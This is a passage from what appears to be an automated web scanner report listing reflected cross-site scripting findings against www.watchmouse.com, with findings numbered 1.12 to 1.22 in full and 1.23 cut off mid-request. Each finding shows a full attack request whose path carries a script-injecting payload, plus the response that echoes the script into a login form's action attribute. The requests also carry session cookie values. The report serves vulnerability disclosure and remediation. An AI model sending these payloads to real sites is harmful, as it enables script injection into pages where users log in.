This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets1c1dc"><script>alert(1)</script>f828aa78b0b/css/screen.css?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-d407bed3fbd7f370bb6dfbda2b8a22c7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets1c1dc"><script>alert(1)</script>f828aa78b0b/css/screen.css?20101008" method="post">
...[SNIP]...

1.12. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2abab"><script>alert(1)</script>fd7f8590f5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css2abab"><script>alert(1)</script>fd7f8590f5f/screen.css?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-76b7dcfeff53e3908ddb4cad637ddebe"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css2abab"><script>alert(1)</script>fd7f8590f5f/screen.css?20101008" method="post">
...[SNIP]...

1.13. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff752"><script>alert(1)</script>c6eccb65ad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/screen.cssff752"><script>alert(1)</script>c6eccb65ad2?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:58 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-4d42bcb1e9b2f0608911865297dbee1e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/screen.cssff752"><script>alert(1)</script>c6eccb65ad2?20101008" method="post">
...[SNIP]...

1.14. http://www.watchmouse.com/assets/css/ui.smoothness.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/ui.smoothness.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a23b0"><script>alert(1)</script>cb2c7595e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsa23b0"><script>alert(1)</script>cb2c7595e94/css/ui.smoothness.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-129ebd42525ec76e8e3d18e1f3f5d298"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsa23b0"><script>alert(1)</script>cb2c7595e94/css/ui.smoothness.css" method="post">
...[SNIP]...

1.15. http://www.watchmouse.com/assets/css/ui.smoothness.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/ui.smoothness.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 916c6"><script>alert(1)</script>e7f74e3f049 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css916c6"><script>alert(1)</script>e7f74e3f049/ui.smoothness.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a6a6d96e30d7ffd9fda6b414daac43ca"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css916c6"><script>alert(1)</script>e7f74e3f049/ui.smoothness.css" method="post">
...[SNIP]...

1.16. http://www.watchmouse.com/assets/css/ui.smoothness.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/ui.smoothness.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d36"><script>alert(1)</script>5ea0dd8e008 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/ui.smoothness.css71d36"><script>alert(1)</script>5ea0dd8e008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-01aa739febfeab6d423052f50e4f9af0"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/ui.smoothness.css71d36"><script>alert(1)</script>5ea0dd8e008" method="post">
...[SNIP]...

1.17. http://www.watchmouse.com/assets/docs/WatchMouse_Product_Features.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Product_Features.pdf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb49c"><script>alert(1)</script>a8ee1747e14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetscb49c"><script>alert(1)</script>a8ee1747e14/docs/WatchMouse_Product_Features.pdf HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:06 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b204e0122919ba4cfffdd798cbeca3e3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetscb49c"><script>alert(1)</script>a8ee1747e14/docs/WatchMouse_Product_Features.pdf" method="post">
...[SNIP]...

1.18. http://www.watchmouse.com/assets/docs/WatchMouse_Product_Features.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Product_Features.pdf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 417d0"><script>alert(1)</script>09f2126b4f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/docs417d0"><script>alert(1)</script>09f2126b4f5/WatchMouse_Product_Features.pdf HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-92e2604f94e05e395fccd6ebdf443064"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/docs417d0"><script>alert(1)</script>09f2126b4f5/WatchMouse_Product_Features.pdf" method="post">
...[SNIP]...

1.19. http://www.watchmouse.com/assets/docs/WatchMouse_Product_Features.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Product_Features.pdf

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29527"><script>alert(1)</script>a4496893305 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/docs/WatchMouse_Product_Features.pdf29527"><script>alert(1)</script>a4496893305 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:25 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f3d52e0e407d258d9f0b84e14f53b859"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/docs/WatchMouse_Product_Features.pdf29527"><script>alert(1)</script>a4496893305" method="post">
...[SNIP]...

1.20. http://www.watchmouse.com/assets/docs/WatchMouse_Scripting_Howto.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Scripting_Howto.pdf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4bbb"><script>alert(1)</script>cb0b92e2eeb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsf4bbb"><script>alert(1)</script>cb0b92e2eeb/docs/WatchMouse_Scripting_Howto.pdf HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2f151adf0c2cae404f426b6506106d8f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsf4bbb"><script>alert(1)</script>cb0b92e2eeb/docs/WatchMouse_Scripting_Howto.pdf" method="post">
...[SNIP]...

1.21. http://www.watchmouse.com/assets/docs/WatchMouse_Scripting_Howto.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Scripting_Howto.pdf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd0f5"><script>alert(1)</script>64740a47699 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/docsdd0f5"><script>alert(1)</script>64740a47699/WatchMouse_Scripting_Howto.pdf HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-12d4e3809c6570acced19d100b12faba"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/docsdd0f5"><script>alert(1)</script>64740a47699/WatchMouse_Scripting_Howto.pdf" method="post">
...[SNIP]...

1.22. http://www.watchmouse.com/assets/docs/WatchMouse_Scripting_Howto.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/docs/WatchMouse_Scripting_Howto.pdf

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac803"><script>alert(1)</script>161de0cf20a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/docs/WatchMouse_Scripting_Howto.pdfac803"><script>alert(1)</script>161de0cf20a HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:25 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-52a07aeac0146c340e8c75b1f55d3842"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/docs/WatchMouse_Scripting_Howto.pdfac803"><script>alert(1)</script>161de0cf20a" method="post">
...[SNIP]...

1.23. http://www.watchmouse.com/assets/img/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 645c0"><script>alert(1)</script>40b63ed072a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets645c0"><script>alert(1)</script>40b63ed072a/img/favicon.ico HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
